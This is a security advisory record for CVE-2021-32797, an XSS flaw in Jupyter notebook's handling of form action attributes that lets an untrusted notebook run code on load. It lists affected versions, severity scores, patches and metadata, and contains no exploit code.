CVE-2021-32797 – notebook

Package

Manager: pip
Name: notebook
Vulnerable Version: >=0 <5.7.11 || >=6.0.0 <6.4.1

Severity

Level: Medium

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N

EPSS: 0.01143 pctl0.77638

Details

JupyterLab: XSS due to lack of sanitization of the action attribute of an html <form> ### Impact Untrusted notebook can execute code on load. This is a remote code execution, but requires user action to open a notebook. ### Patches Patched in the following versions: 3.1.4, 3.0.17, 2.3.2, 2.2.10, 1.2.21. ### References [OWASP Page on Restricting Form Submissions](https://cheatsheetseries.owasp.org/cheatsheets/Content_Security_Policy_Cheat_Sheet.html) ### For more information If you have any questions or comments about this advisory, or vulnerabilities to report, please email our security list security@ipython.org. Credit: Guillaume Jeanne from Google

Metadata

Created: 2021-08-23T19:40:22Z
Modified: 2024-11-18T16:26:15Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-4952-p58q-6crx/GHSA-4952-p58q-6crx.json
CWE IDs: ["CWE-75", "CWE-79", "CWE-87"]
Alternative ID: GHSA-4952-p58q-6crx
Finding: F008
Auto approve: 1